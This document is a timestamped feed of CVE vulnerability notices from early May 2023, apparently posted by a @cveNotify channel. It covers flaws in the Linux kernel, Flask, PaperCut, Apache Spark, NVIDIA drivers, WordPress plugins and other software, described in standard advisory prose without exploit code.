🚨 CVE-2023-31081An issue was discovered in drivers/media/test-drivers/vidtv/vidtv_bridge.c in the Linux kernel 6.2. There is a NULL pointer dereference in vidtv_mux_stop_thread. In vidtv_stop_streaming, after dvb->mux=NULL occurs, it executes vidtv_mux_stop_thread(dvb->mux).🎖@cveNotify |
|
| 2023-05-02 21:58:25 |
🚨 CVE-2023-31082An issue was discovered in drivers/tty/n_gsm.c in the Linux kernel 6.2. There is a sleeping function called from an invalid context in gsmld_write, which will block the kernel.🎖@cveNotify |
|
| 2023-05-02 21:58:24 |
🚨 CVE-2023-31059Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.🎖@cveNotify |
|
| 2023-05-02 21:58:23 |
🚨 CVE-2023-31060Repetier Server through 1.4.10 executes as SYSTEM. This can be leveraged in conjunction with CVE-2023-31059 for full compromise.🎖@cveNotify |
|
| 2023-05-02 21:58:22 |
🚨 CVE-2023-31061Repetier Server through 1.4.10 does not have CSRF protection.🎖@cveNotify |
|
| 2023-05-02 21:58:18 |
🚨 CVE-2023-30861Flask is a lightweight WSGI web application framework. When all of the following conditions are met, a response containing data intended for one client may be cached and subsequently sent by the proxy to other clients. If the proxy also caches `Set-Cookie` headers, it may send one client's `session` cookie to other clients. The severity depends on the application's use of the session and the proxy's behavior regarding cookies. The risk depends on all these conditions being met.1. The application must be hosted behind a caching proxy that does not strip cookies or ignore responses with cookies.2. The application sets `session.permanent = True`3. The application does not access or modify the session at any point during a request.4. `SESSION_REFRESH_EACH_REQUEST` enabled (the default).5. The application does not set a `Cache-Control` header to indicate that a page is private or should not be cached.This happens because vulnerable versions of Flask only set the `Vary: Cookie` header when the session is accessed or modified, not when it is refreshed (re-sent to update the expiration) without being accessed or modified. This issue has been fixed in versions 2.3.2 and 2.2.5.🎖@cveNotify |
|
| 2023-05-02 21:58:17 |
🚨 CVE-2023-2193Mattermost fails to invalidate existing authorization codes when deauthorizing an OAuth2 app, allowing an attacker possessing an authorization code to generate an access token.🎖@cveNotify |
|
| 2023-05-02 21:58:16 |
🚨 CVE-2023-2112Desktop component service allows lateral movement between sessions in M-Files before 23.4.12455.0. 🎖@cveNotify |
|
| 2023-05-02 21:58:15 |
🚨 CVE-2023-2219A vulnerability was found in SourceCodester Task Reminder System 1.0 and classified as problematic. This issue affects some unknown processing of the file /classes/Users.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226985 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-02 18:58:28 |
🚨 CVE-2022-47505The SolarWinds Platform was susceptible to the Local Privilege Escalation Vulnerability. This vulnerability allows a local adversary with a valid system user account to escalate local privileges.🎖@cveNotify |
|
| 2023-05-02 18:58:27 |
🚨 CVE-2023-26557io.finnet tss-lib before 2.0.0 can leak the lambda value of a private key via a timing side-channel attack because it relies on Go big.Int, which is not constant time for Cmp, modular exponentiation, or modular inverse. An example leak is in crypto/paillier/paillier.go. (bnb-chain/tss-lib and thorchain/tss are also affected.)🎖@cveNotify |
|
| 2023-05-02 18:58:26 |
🚨 CVE-2023-26556io.finnet tss-lib before 2.0.0 can leak a secret key via a timing side-channel attack because it relies on the scalar-multiplication implementation in Go crypto/elliptic, which is not constant time (there is an if statement in a loop). One leak is in ecdsa/keygen/round_2.go. (bnb-chain/tss-lib and thorchain/tss are also affected.)🎖@cveNotify |
|
| 2023-05-02 18:58:22 |
🚨 CVE-2022-47930An issue was discovered in IO FinNet tss-lib before 2.0.0. The parameter ssid for defining a session id is not used through the MPC implementation, which makes replaying and spoofing of messages easier. In particular, the Schnorr proof of knowledge implemented in sch.go does not utilize a session id, context, or random nonce in the generation of the challenge. This could allow a malicious user or an eavesdropper to replay a valid proof sent in the past.🎖@cveNotify |
|
| 2023-05-02 18:58:21 |
🚨 CVE-2023-29849Bang Resto 1.0 was discovered to contain multiple SQL injection vulnerabilities via the btnMenuItemID, itemID, itemPrice, menuID, staffID, or itemqty parameter.🎖@cveNotify |
|
| 2023-05-02 18:58:20 |
🚨 CVE-2023-1255Issue summary: The AES-XTS cipher decryption implementation for 64 bit ARMplatform contains a bug that could cause it to read past the input buffer,leading to a crash.Impact summary: Applications that use the AES-XTS algorithm on the 64 bit ARMplatform can crash in rare circumstances. The AES-XTS algorithm is usuallyused for disk encryption.The AES-XTS cipher decryption implementation for 64 bit ARM platform will readpast the end of the ciphertext buffer if the ciphertext size is 4 mod 5 in 16byte blocks, e.g. 144 bytes or 1024 bytes. If the memory after the ciphertextbuffer is unmapped, this will trigger a crash which results in a denial ofservice.If an attacker can control the size and location of the ciphertext bufferbeing decrypted by an application using AES-XTS on 64 bit ARM, theapplication is affected. This is fairly unlikely making this issuea Low severity one.🎖@cveNotify |
|
| 2023-05-02 18:58:19 |
🚨 CVE-2023-1324The Easy Forms for Mailchimp WordPress plugin before 6.8.8 does not sanitise and escape some parameters before outputting them back in the response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-05-02 18:58:15 |
🚨 CVE-2023-27351This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SecurityRequestFilter class. The issue results from improper implementation of the authentication algorithm. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19226.🎖@cveNotify |
|
| 2023-05-02 18:58:14 |
🚨 CVE-2023-29867Zammad 5.3.x (Fixed 5.4.0) is vulnerable to Incorrect Access Control. An authenticated attacker could gain information about linked accounts of users involved in their tickets using the Zammad API.🎖@cveNotify |
|
| 2023-05-02 18:58:13 |
🚨 CVE-2023-29868Zammad 5.3.x (Fixed in 5.4.0) is vulnerable to Incorrect Access Control. An authenticated attacker with agent and customer roles could perform unauthorized changes on articles where they only have customer permissions.🎖@cveNotify |
|
| 2023-05-02 18:58:12 |
🚨 CVE-2023-27350This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.🎖@cveNotify |
|
| 2023-05-02 16:58:37 |
🚨 CVE-2023-2211A vulnerability was found in Campcodes Coffee Shop POS System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/categories/manage_category.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226976.🎖@cveNotify |
|
| 2023-05-02 16:58:36 |
🚨 CVE-2023-0202NVIDIA DGX A100 SBIOS contains a vulnerability where an attacker may modify arbitrary memory of SMRAM by exploiting the GenericSio and LegacySmmSredir SMM APIs. A successful exploit of this vulnerability may lead to denial of service, escalation of privileges, and information disclosure.🎖@cveNotify |
|
| 2023-05-02 16:58:35 |
🚨 CVE-2023-29856** UNSUPPORTED WHEN ASSIGNED ** D-Link DIR-868L Hardware version A1, firmware version 1.12 is vulnerable to Buffer Overflow. The vulnerability is in scandir.sgi binary.🎖@cveNotify |
|
| 2023-05-02 16:58:34 |
🚨 CVE-2023-2479OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.🎖@cveNotify |
|
| 2023-05-02 16:58:33 |
🚨 CVE-2023-32007** UNSUPPORTED WHEN ASSIGNED ** The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This issue was disclosed earlier as CVE-2022-33891, but incorrectly claimed version 3.1.3 (which has since gone EOL) would not be affected.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.Users are recommended to upgrade to a supported version of Apache Spark, such as version 3.4.0.🎖@cveNotify |
|
| 2023-05-02 16:58:32 |
🚨 CVE-2022-33891The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.🎖@cveNotify |
|
| 2023-05-02 16:58:31 |
🚨 CVE-2022-36788A heap-based buffer overflow vulnerability exists in the TriangleMesh clone functionality of Slic3r libslic3r 1.3.0 and Master Commit b1a5500. A specially-crafted STL file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-05-02 16:58:30 |
🚨 CVE-2023-0206NVIDIA DGX A100 SBIOS contains a vulnerability where an attacker may modify arbitrary memory of SMRAM by exploiting the NVME SMM API. A successful exploit of this vulnerability may lead to denial of service, escalation of privileges, and information disclosure.🎖@cveNotify |
|
| 2023-05-02 16:58:29 |
🚨 CVE-2023-25513NVIDIA CUDA toolkit for Linux and Windows contains a vulnerability in cuobjdump, where an attacker may cause an out-of-bounds read by tricking a user into running cuobjdump on a malformed input file. A successful exploit of this vulnerability may lead to limited denial of service, code execution, and limited information disclosure.🎖@cveNotify |
|
| 2023-05-02 16:58:28 |
🚨 CVE-2023-1126The WP FEvents Book WordPress plugin through 0.46 does not sanitise and escape some parameters, which could allow any authenticated users, such as subscriber to perform Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-05-02 16:58:23 |
🚨 CVE-2023-1420The Ajax Search Lite WordPress plugin before 4.11.1, Ajax Search Pro WordPress plugin before 4.26.2 does not sanitise and escape a parameter before outputting it back in a response of an AJAX action, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-05-02 16:58:22 |
🚨 CVE-2023-1435The Ajax Search Pro WordPress plugin before 4.26.2 does not sanitise and escape various parameters before outputting them back in pages, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-05-02 16:58:21 |
🚨 CVE-2023-25512NVIDIA CUDA toolkit for Linux and Windows contains a vulnerability in cuobjdump, where an attacker may cause an out-of-bounds memory read by running cuobjdump on a malformed input file. A successful exploit of this vulnerability may lead to limited denial of service, code execution, and limited information disclosure.🎖@cveNotify |
|
| 2023-05-02 16:58:20 |
🚨 CVE-2023-25511NVIDIA CUDA Toolkit for Linux and Windows contains a vulnerability in cuobjdump, where a division-by-zero error may enable a user to cause a crash, which may lead to a limited denial of service.🎖@cveNotify |
|
| 2023-05-02 16:58:16 |
🚨 CVE-2023-2209A vulnerability, which was classified as critical, was found in Campcodes Coffee Shop POS System 1.0. Affected is an unknown function of the file /admin/sales/view_details.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226974 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-02 16:58:15 |
🚨 CVE-2023-0199NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler, where an out-of-bounds write can lead to denial of service and data tampering.🎖@cveNotify |
|
| 2023-05-02 16:58:14 |
🚨 CVE-2023-0184NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler which may lead to denial of service, escalation of privileges, information disclosure, and data tampering.🎖@cveNotify |
|
| 2023-05-02 16:58:13 |
🚨 CVE-2023-0190NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where a NULL pointer dereference may lead to denial of service.🎖@cveNotify |
|
| 2023-05-02 16:58:12 |
🚨 CVE-2023-25510NVIDIA CUDA Toolkit SDK for Linux and Windows contains a NULL pointer dereference in cuobjdump, where a local user running the tool against a malformed binary may cause a limited denial of service.🎖@cveNotify |
|
| 2023-05-02 12:58:13 |
🚨 CVE-2023-30869Improper Authentication vulnerability in Easy Digital Downloads plugin allows unauth. Privilege Escalation. This issue affects Easy Digital Downloads: from 3.1 through 3.1.1.4.1.🎖@cveNotify |
|
| 2023-05-02 12:58:12 |
🚨 CVE-2022-1113The Flower Delivery by Florist One WordPress plugin through 3.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks when the unfiltered_html capability is disallowed (for example in multisite setups)🎖@cveNotify |
|
| 2023-05-02 11:58:33 |
🚨 CVE-2023-1525The Site Reviews WordPress plugin before 6.7.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-05-02 11:58:32 |
🚨 CVE-2023-1554The Quick Paypal Payments WordPress plugin before 5.7.26.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-05-02 11:58:31 |
🚨 CVE-2023-1614The WP Custom Author URL WordPress plugin before 1.0.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-05-02 11:58:27 |
🚨 CVE-2023-1730The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks🎖@cveNotify |
|
| 2023-05-02 11:58:26 |
🚨 CVE-2023-1805The Product Catalog Feed by PixelYourSite WordPress plugin before 2.1.1 does not sanitise and escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-05-02 11:58:25 |
🚨 CVE-2023-1809The Download Manager WordPress plugin before 6.3.0 leaks master key information without the need for a password, allowing attackers to download arbitrary password-protected package files.🎖@cveNotify |
|
| 2023-05-02 11:58:21 |
🚨 CVE-2023-1911The Blocksy Companion WordPress plugin before 1.8.82 does not ensure that posts to be accessed via a shortcode are already public and can be viewed, allowing any authenticated users, such as subscriber to access draft posts for example🎖@cveNotify |
|
| 2023-05-02 11:58:20 |
🚨 CVE-2022-40505Information disclosure due to buffer over-read in Modem while parsing DNS hostname.🎖@cveNotify |
|
| 2023-05-02 11:58:19 |
🚨 CVE-2022-40508Transient DOS due to reachable assertion in Modem while processing config related to cross carrier scheduling, which is not supported.🎖@cveNotify |
|
| 2023-05-02 11:58:15 |
🚨 CVE-2023-21666Memory Corruption in Graphics while accessing a buffer allocated through the graphics pool.🎖@cveNotify |
|
| 2023-05-02 11:58:14 |
🚨 CVE-2022-33292Memory corruption in Qualcomm IPC due to use after free while receiving the incoming packet and reposting it.🎖@cveNotify |
|
| 2023-05-02 11:58:13 |
🚨 CVE-2022-33304Transient DOS due to NULL pointer dereference in Modem while performing pullup for received TCP/UDP packet.🎖@cveNotify |
|
| 2023-05-02 05:59:35 |
🚨 CVE-2023-2133Out of bounds memory access in Service Worker API in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-05-02 05:59:34 |
🚨 CVE-2023-2135Use after free in DevTools in Google Chrome prior to 112.0.5615.137 allowed a remote attacker who convinced a user to enable specific preconditions to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-05-02 05:59:33 |
🚨 CVE-2023-2137Heap buffer overflow in sqlite in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-05-02 05:59:29 |
🚨 CVE-2023-2033Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-05-02 05:59:28 |
🚨 CVE-2013-10026A vulnerability, which was classified as problematic, has been found in Mail Subscribe List Plugin up to 2.0.10 on WordPress. This issue affects some unknown processing of the file index.php. The manipulation of the argument sml_name/sml_email leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.1 is able to address this issue. The name of the patch is 484970ef8285cae51d2de3bd4e4684d33c956c28. It is recommended to upgrade the affected component. The identifier VDB-227765 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-02 05:59:27 |
🚨 CVE-2023-27495@fastify/csrf-protection is a plugin which helps protect Fastify servers against CSRF attacks. The CSRF protection enforced by the @fastify/csrf-protection library in combination with @fastify/cookie can be bypassed from network and same-site attackers under certain conditions. @fastify/csrf-protection supports an optional userInfo parameter that binds the CSRF token to the user. This parameter has been introduced to prevent cookie-tossing attacks as a fix for CVE-2021-29624. Whenever userInfo parameter is missing, or its value can be predicted for the target user account, network and same-site attackers can 1. fixate a _csrf cookie in the victim's browser, and 2. forge CSRF tokens that are valid for the victim's session. This allows attackers to bypass the CSRF protection mechanism. As a fix, @fastify/csrf-protection starting from version 6.3.0 (and v4.1.0) includes a server-defined secret hmacKey that cryptographically binds the CSRF token to the value of the _csrf cookie and the userInfo parameter, making tokens non-spoofable by attackers. This protection is effective as long as the userInfo parameter is unique for each user. This is patched in versions 6.3.0 and v4.1.0. Users are advised to upgrade. Users unable to upgrade may use a random, non-predictable userInfo parameter for each user as a mitigation.🎖@cveNotify |
|
| 2023-05-02 05:59:23 |
🚨 CVE-2023-23579Datakit CrossCadWare_x64.dll contains an out-of-bounds write past the end of an allocated buffer while parsing a specially crafted SLDPRT file. This could allow an attacker to execute code in the context of the current process. 🎖@cveNotify |
|
| 2023-05-02 05:59:22 |
🚨 CVE-2023-22354Datakit CrossCadWare_x64.dll contains an out-of-bounds read past the end of an allocated buffer while parsing a specially crafted SLDPRT file. This vulnerability could allow an attacker to disclose sensitive information. 🎖@cveNotify |
|
| 2023-05-02 05:59:21 |
🚨 CVE-2023-22321Datakit CrossCadWare_x64.dll contains an out-of-bounds read past the end of an allocated buffer while parsing a specially crafted SLDPRT file. This vulnerability could allow an attacker to disclose sensitive information. 🎖@cveNotify |
|
| 2023-05-02 05:59:18 |
🚨 CVE-2023-22295Datakit CrossCadWare_x64.dll contains an out of bounds read past the end of an allocated buffer while parsing a specially crafted SLDPRT file. This vulnerability could allow an attacker to disclose sensitive information.🎖@cveNotify |
|
| 2023-05-02 05:59:17 |
🚨 CVE-2023-2202Improper Access Control in GitHub repository francoisjacquet/rosariosis prior to 10.9.3.🎖@cveNotify |
|
| 2023-05-02 05:59:16 |
🚨 CVE-2023-20864VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.🎖@cveNotify |
|
| 2023-05-02 01:58:20 |
🚨 CVE-2023-26987An issue discovered in Konga 0.14.9 allows remote attackers to manipulate user accounts regardless of privilege via crafted POST request.🎖@cveNotify |
|
| 2023-05-02 01:58:19 |
🚨 CVE-2023-27035An issue discovered in Obsidian Canvas 1.1.9 allows remote attackers to send desktop notifications, record user audio and other unspecified impacts via embedded website on the canvas page.🎖@cveNotify |
|
| 2023-05-02 01:58:15 |
🚨 CVE-2023-29680Cleartext Transmission in set-cookie:ecos_pw: Tenda N301 v6.0, Firmware v12.02.01.61_multi allows an authenticated attacker on the LAN or WLAN to intercept communications with the router and obtain the password.🎖@cveNotify |
|
| 2023-05-02 01:58:14 |
🚨 CVE-2023-29681Cleartext Transmission in cookie:ecos_pw: in Tenda N301 v6.0, firmware v12.03.01.06_pt allows an authenticated attacker on the LAN or WLAN to intercept communications with the router and obtain the password.🎖@cveNotify |
|
| 2023-05-02 01:58:13 |
🚨 CVE-2023-30639Archer Platform 6.8 before 6.12 P6 HF1 (6.12.0.6.1) contains a stored XSS vulnerability. A remote authenticated malicious Archer user could potentially exploit this vulnerability to store malicious HTML or JavaScript code in a trusted application data store. 6.11.P4 (6.11.0.4) is also a fixed release.🎖@cveNotify |
|
| 2023-05-02 01:58:12 |
🚨 CVE-2022-46705A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1, Safari 16.2. Visiting a malicious website may lead to address bar spoofing.🎖@cveNotify |
|
| 2023-05-01 22:58:32 |
🚨 CVE-2023-29641Cross Site Scripting (XSS) vulnerability in pandao editor.md thru 1.5.0 allows attackers to inject arbitrary web script or HTML via crafted markdown text.🎖@cveNotify |
|
| 2023-05-01 22:58:31 |
🚨 CVE-2023-2451A vulnerability was found in SourceCodester Online DJ Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/bookings/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227795.🎖@cveNotify |
|
| 2023-05-01 22:58:30 |
🚨 CVE-2023-22919The post-authentication command injection vulnerability in the Zyxel NBG6604 firmware version V1.01(ABIR.0)C0 could allow an authenticated attacker to execute some OS commands remotely by sending a crafted HTTP request.🎖@cveNotify |
|
| 2023-05-01 22:58:26 |
🚨 CVE-2023-22921A cross-site scripting (XSS) vulnerability in the Zyxel NBG-418N v2 firmware versions prior to V1.00(AARP.14)C0 could allow a remote authenticated attacker with administrator privileges to store malicious scripts using a web management interface parameter, resulting in denial-of-service (DoS) conditions on an affected device.🎖@cveNotify |
|
| 2023-05-01 22:58:25 |
🚨 CVE-2023-22922A buffer overflow vulnerability in the Zyxel NBG-418N v2 firmware versions prior to V1.00(AARP.14)C0 could allow a remote unauthenticated attacker to cause DoS conditions by sending crafted packets if Telnet is enabled on a vulnerable device.🎖@cveNotify |
|
| 2023-05-01 22:58:24 |
🚨 CVE-2023-22924A buffer overflow vulnerability in the Zyxel NBG-418N v2 firmware versions prior to V1.00(AARP.14)C0 could allow a remote authenticated attacker with administrator privileges to cause denial-of-service (DoS) conditions by executing crafted CLI commands on a vulnerable device.🎖@cveNotify |
|
| 2023-05-01 22:58:23 |
🚨 CVE-2023-0896A default password was reported in Lenovo Smart Clock Essential with Alexa Built In that could allow unauthorized device access to an attacker with local network access. 🎖@cveNotify |
|
| 2023-05-01 22:58:19 |
🚨 CVE-2023-30063D-Link DIR-890L FW1.10 A1 is vulnerable to Authentication bypass.🎖@cveNotify |
|
| 2023-05-01 22:58:18 |
🚨 CVE-2022-45801Apache StreamPark 1.0.0 to 2.0.0 have a LDAP injection vulnerability.LDAP Injection is an attack used to exploit web based applicationsthat construct LDAP statements based on user input. When anapplication fails to properly sanitize user input, it's possible tomodify LDAP statements through techniques similar to SQL Injection.LDAP injection attacks could result in the granting of permissions tounauthorized queries, and content modification inside the LDAP tree.This risk may only occur when the user logs in with ldap, and the username and password login will not be affected, Users of the affectedversions should upgrade to Apache StreamPark 2.0.0 or later.🎖@cveNotify |
|
| 2023-05-01 22:58:17 |
🚨 CVE-2022-45802Streampark allows any users to upload a jar as application, but there is no mandatory verification of the uploaded file type, causing users to upload some high-risk files, and may upload them to any directory, Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later🎖@cveNotify |
|
| 2023-05-01 22:58:14 |
🚨 CVE-2022-46365Apache StreamPark 1.0.0 before 2.0.0 When the user successfully logs in, to modify his profile, the username will be passed to the server-layer as a parameter, but not verified whether the user name is the currently logged user and whether the user is legal, This will allow malicious attackers to send any username to modify and reset the account, Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later.🎖@cveNotify |
|
| 2023-05-01 22:58:13 |
🚨 CVE-2022-48186A certificate validation vulnerability exists in the Baiying Android application which could lead to information disclosure.🎖@cveNotify |
|
| 2023-05-01 22:58:12 |
🚨 CVE-2023-25492A valid, authenticated user may be able to trigger a denial of service of the XCC web user interface or other undefined behavior through a format string injection vulnerability in a web interface API.🎖@cveNotify |
|
| 2023-05-01 20:58:39 |
🚨 CVE-2023-30797Netflix Lemur before version 1.3.2 used insufficiently random values when generating default credentials. The insufficiently random values may allow an attacker to guess the credentials and gain access to resources managed by Lemur.🎖@cveNotify |
|
| 2023-05-01 20:58:38 |
🚨 CVE-2021-33974Qihoo 360 (https://www.360.cn/) Qihoo 360 Safeguard (https://www.360.cn/) Qihoo 360 Chrome (https://browser.360.cn/ee/) is affected by: Buffer Overflow. The impact is: execute arbitrary code (remote). The component is: This is a set of vulnerabilities affecting popular software, and the installation packages correspond to versions "360 Safeguard(12.1.0.1004,12.1.0.1005,13.1.0.1001)" , "360 Total Security(10.8.0.1060,10.8.0.1213)", "360 Safe Browser & 360 Chrome(12. The attack vector is: On the browser vulnerability, just open a link to complete the vulnerability exploitation remotely; on the client software, you need to locally execute the vulnerability exploitation program, which of course can be achieved with the full chain of browser vulnerability. ¶¶ This is a set of the most serious vulnerabilities that exist on Qihoo 360's PC client multiple popular software, remote vulnerabilities can be accomplished by opening a link to arbitrary code execution on both security browsers, in conjunction with the exploitation of local vulnerabilities that allow spyware to persist without being scanned to permanently reside on the target PC computer (because local vulnerabilities target Qihoo 360 company's antivirus software kernel flaws); this set of remote and local vulnerabilities in perfect coordination, to achieve an information security fallacy, on Qihoo 360's antivirus software vulnerability, not only can not be scanned out of the virus, but will help the virus persistently control the target computer, while Qihoo 360 claims to be a secure browser, which exists in the kernel vulnerability but help the composition of the remote vulnerability.(Security expert "Memory Corruptor" have reported this set of vulnerabilities to the corresponding vendor, all vulnerabilities have been fixed and the vendor rewarded thousands of dollars to this security expert)🎖@cveNotify |
|
| 2023-05-01 20:58:37 |
🚨 CVE-2023-28984A Use After Free vulnerability in the Layer 2 Address Learning Manager (l2alm) of Juniper Networks Junos OS on QFX Series allows an adjacent attacker to cause the Packet Forwarding Engine to crash and restart, leading to a Denial of Service (DoS). The PFE may crash when a lot of MAC learning and aging happens, but due to a Race Condition (Concurrent Execution using Shared Resource with Improper Synchronization) that is outside the attackers direct control. This issue affects: Juniper Networks Junos OS versions prior to 19.4R3-S10 on QFX Series; 20.2 versions prior to 20.2R3-S7 on QFX Series; 20.3 versions prior to 20.3R3-S6 on QFX Series; 20.4 versions prior to 20.4R3-S5 on QFX Series; 21.1 versions prior to 21.1R3-S4 on QFX Series; 21.2 versions prior to 21.2R3-S3 on QFX Series; 21.3 versions prior to 21.3R3-S3 on QFX Series; 21.4 versions prior to 21.4R3 on QFX Series; 22.1 versions prior to 22.1R3 on QFX Series; 22.2 versions prior to 22.2R2 on QFX Series.🎖@cveNotify |
|
| 2023-05-01 20:58:36 |
🚨 CVE-2023-1585Avast and AVG Antivirus for Windows were susceptible to a Time-of-check/Time-of-use (TOCTOU) vulnerability in the Quarantine process, leading to arbitrary file/directory deletion. The issue was fixed with Avast and AVG Antivirus version 22.11 and virus definitions from 14 February 2023 or later. 🎖@cveNotify |
|
| 2023-05-01 20:58:35 |
🚨 CVE-2023-1586Avast and AVG Antivirus for Windows were susceptible to a Time-of-check/Time-of-use (TOCTOU) vulnerability in the restore process leading to arbitrary file creation. The issue was fixed with Avast and AVG Antivirus version 22.11🎖@cveNotify |
|
| 2023-05-01 20:58:31 |
🚨 CVE-2023-25601On version 3.0.0 through 3.1.1, Apache DolphinScheduler's python gateway suffered from improper authentication: an attacker could use a socket bytes attack without authentication. This issue has been fixed from version 3.1.2 onwards. For users who use version 3.0.0 to 3.1.1, you can turn off the python-gateway function by changing the value `python-gateway.enabled=false` in configuration file `application.yaml`. If you are using the python gateway, please upgrade to version 3.1.2 or above.🎖@cveNotify |
|
| 2023-05-01 20:58:30 |
🚨 CVE-2023-20873In Spring Boot versions 3.0.0 - 3.0.5, 2.7.0 - 2.7.10, and older unsupported versions, an application that is deployed to Cloud Foundry could be susceptible to a security bypass. Users of affected versions should apply the following mitigation: 3.0.x users should upgrade to 3.0.6+. 2.7.x users should upgrade to 2.7.11+. Users of older, unsupported versions should upgrade to 3.0.6+ or 2.7.11+.🎖@cveNotify |
|
| 2023-05-01 20:58:29 |
🚨 CVE-2023-30616Form block is a wordpress plugin designed to make form creation easier. Versions prior to 1.0.2 are subject to a Cross-Site Request Forgery due to a missing nonce check. There is potential for a Cross Site Request Forgery for all form blocks, since it allows to send requests to the forms from any website without a user noticing. Users are advised to upgrade to version 1.0.2. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-05-01 20:58:28 |
🚨 CVE-2023-27090Cross Site Scripting vulnerability found in TeaCMS storage allows attacker to cause a leak of sensitive information via the article title parameter.🎖@cveNotify |
|
| 2023-05-01 20:58:27 |
🚨 CVE-2023-20862In Spring Security, versions 5.7.x prior to 5.7.8, versions 5.8.x prior to 5.8.3, and versions 6.0.x prior to 6.0.3, the logout support does not properly clean the security context if using serialized versions. Additionally, it is not possible to explicitly save an empty security context to the HttpSessionSecurityContextRepository. This vulnerability can keep users authenticated even after they performed logout. Users of affected versions should apply the following mitigation. 5.7.x users should upgrade to 5.7.8. 5.8.x users should upgrade to 5.8.3. 6.0.x users should upgrade to 6.0.3.🎖@cveNotify |
|
| 2023-05-01 20:58:26 |
🚨 CVE-2022-37381This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the AFSpecial_KeystrokeEx method. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-17110.🎖@cveNotify |
|
| 2023-05-01 20:58:25 |
